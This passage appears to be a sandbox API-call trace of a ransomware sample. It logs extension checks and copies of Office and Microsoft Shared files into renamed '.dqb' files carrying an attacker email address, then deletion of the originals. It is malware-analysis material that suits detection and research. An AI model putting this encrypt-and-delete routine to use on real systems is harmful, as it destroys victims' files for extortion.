(lpString1=".docx", lpString2="p.dll") returned -1 [0049.090] lstrlenW (lpString=".pdf") returned 4 [0049.090] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString=".xls") returned 4 [0049.090] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString=".xlsx") returned 5 [0049.090] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0049.090] lstrlenW (lpString=".ppt") returned 4 [0049.090] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.090] lstrlenW (lpString=".zip") returned 4 [0049.090] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString=".rar") returned 4 [0049.090] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.090] lstrlenW (lpString=".bz2") returned 4 [0049.090] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.090] lstrlenW (lpString=".7z") returned 3 [0049.090] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.090] lstrlenW (lpString=".dbf") returned 4 [0049.090] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.090] lstrlenW (lpString=".1cd") returned 4 [0049.090] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.090] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0049.090] lstrlenW (lpString=".jpg") returned 4 [0049.090] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.090] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0049.090] lstrlenW (lpString="setup.exe") returned 9 [0049.091] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.676] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1377656) returned 1 [0050.676] CloseHandle (hObject=0x200) returned 1 [0050.676] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0050.677] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.677] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.677] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.677] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.677] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0050.677] GetLastError () returned 0x0 [0050.677] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.700] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.718] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x50588, lpOverlapped=0x0) returned 1 [0050.730] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0050.739] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.739] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.739] SetEndOfFile (hFile=0x1f8) returned 1 [0050.739] CloseHandle (hObject=0x1f8) returned 1 [0050.739] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.740] SetEndOfFile (hFile=0x200) returned 1 [0050.742] CloseHandle (hObject=0x200) returned 1 [0050.743] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0050.743] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0050.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.743] lstrlenW (lpString=".doc") returned 4 [0050.743] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.743] lstrlenW (lpString=".docx") returned 5 [0050.743] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.743] lstrlenW (lpString=".pdf") returned 4 [0050.743] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.743] lstrlenW (lpString=".xls") returned 4 [0050.743] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.743] lstrlenW (lpString=".xlsx") returned 5 [0050.743] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.743] lstrlenW (lpString=".ppt") returned 4 [0050.743] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.743] lstrlenW (lpString=".zip") returned 4 [0050.743] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.743] lstrlenW (lpString=".rar") returned 4 [0050.743] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.743] lstrlenW (lpString=".bz2") returned 4 [0050.744] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.744] lstrlenW (lpString=".7z") returned 3 [0050.744] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString=".dbf") returned 4 [0050.744] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString=".1cd") returned 4 [0050.744] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString=".jpg") returned 4 [0050.744] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString=".doc") returned 4 [0050.744] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.744] lstrlenW (lpString=".docx") returned 5 [0050.744] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.744] lstrlenW (lpString=".pdf") returned 4 [0050.744] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString=".xls") returned 4 [0050.744] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString=".xlsx") returned 5 [0050.744] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.744] lstrlenW (lpString=".ppt") returned 4 [0050.744] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.744] lstrlenW (lpString=".zip") returned 4 [0050.744] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString=".rar") returned 4 [0050.744] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.744] lstrlenW (lpString=".bz2") returned 4 [0050.744] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.744] lstrlenW (lpString=".7z") returned 3 [0050.744] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.745] lstrlenW (lpString=".dbf") returned 4 [0050.745] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.745] lstrlenW (lpString=".1cd") returned 4 [0050.745] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.745] lstrlenW (lpString=".jpg") returned 4 [0050.745] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.745] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0050.745] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0050.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.746] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1369952) returned 1 [0050.746] CloseHandle (hObject=0x200) returned 1 [0050.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20 [0050.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0050.746] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.746] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0050.747] GetLastError () returned 0x0 [0050.747] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.768] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.786] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x4e770, lpOverlapped=0x0) returned 1 [0050.797] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x4e780, lpOverlapped=0x0) returned 1 [0051.166] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.166] WriteFile (in: hFile=0x1f8, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.166] SetEndOfFile (hFile=0x1f8) returned 1 [0051.505] CloseHandle (hObject=0x1f8) returned 1 [0051.505] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.505] SetEndOfFile (hFile=0x200) returned 1 [0051.508] CloseHandle (hObject=0x200) returned 1 [0051.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.508] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString=".doc") returned 4 [0051.509] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString=".docx") returned 5 [0051.509] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.509] lstrlenW (lpString=".pdf") returned 4 [0051.509] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString=".xls") returned 4 [0051.509] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString=".xlsx") returned 5 [0051.509] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.509] lstrlenW (lpString=".ppt") returned 4 [0051.509] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString=".zip") returned 4 [0051.509] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString=".rar") returned 4 [0051.509] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.509] lstrlenW (lpString=".bz2") returned 4 [0051.509] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.509] lstrlenW (lpString=".7z") returned 3 [0051.509] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString=".dbf") returned 4 [0051.509] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString=".1cd") returned 4 [0051.509] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.509] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.509] lstrlenW (lpString=".jpg") returned 4 [0051.509] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString=".doc") returned 4 [0051.510] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString=".docx") returned 5 [0051.510] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0051.510] lstrlenW (lpString=".pdf") returned 4 [0051.510] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString=".xls") returned 4 [0051.510] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString=".xlsx") returned 5 [0051.510] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0051.510] lstrlenW (lpString=".ppt") returned 4 [0051.510] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString=".zip") returned 4 [0051.510] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString=".rar") returned 4 [0051.510] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.510] lstrlenW (lpString=".bz2") returned 4 [0051.510] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.510] lstrlenW (lpString=".7z") returned 3 [0051.510] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString=".dbf") returned 4 [0051.510] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString=".1cd") returned 4 [0051.510] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.510] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0051.510] lstrlenW (lpString=".jpg") returned 4 [0051.510] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.510] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0051.511] lstrlenW (lpString="offfiltx.dll") returned 12 [0051.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0052.624] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1486736) returned 1 [0052.624] CloseHandle (hObject=0x22c) returned 1 [0052.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20 [0052.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0052.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0052.624] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.624] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.625] GetLastError () returned 0x0 [0052.625] ReadFile (in: hFile=0x22c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.644] WriteFile (in: hFile=0x17c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.746] ReadFile (in: hFile=0x22c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x6afa0, lpOverlapped=0x0) returned 1 [0052.763] WriteFile (in: hFile=0x17c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x6afb0, lpOverlapped=0x0) returned 1 [0052.774] ReadFile (in: hFile=0x22c, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.774] WriteFile (in: hFile=0x17c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.774] SetEndOfFile (hFile=0x17c) returned 1 [0052.774] CloseHandle (hObject=0x17c) returned 1 [0052.775] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.775] SetEndOfFile (hFile=0x22c) returned 1 [0052.778] CloseHandle (hObject=0x22c) returned 1 [0052.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.779] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1 [0052.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.779] lstrlenW (lpString=".doc") returned 4 [0052.779] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.779] lstrlenW (lpString=".docx") returned 5 [0052.779] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0052.779] lstrlenW (lpString=".pdf") returned 4 [0052.779] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.779] lstrlenW (lpString=".xls") returned 4 [0052.779] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.779] lstrlenW (lpString=".xlsx") returned 5 [0052.779] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0052.779] lstrlenW (lpString=".ppt") returned 4 [0052.780] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString=".zip") returned 4 [0052.780] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString=".rar") returned 4 [0052.780] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.780] lstrlenW (lpString=".bz2") returned 4 [0052.780] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.780] lstrlenW (lpString=".7z") returned 3 [0052.780] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0052.780] lstrlenW (lpString=".dbf") returned 4 [0052.780] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned 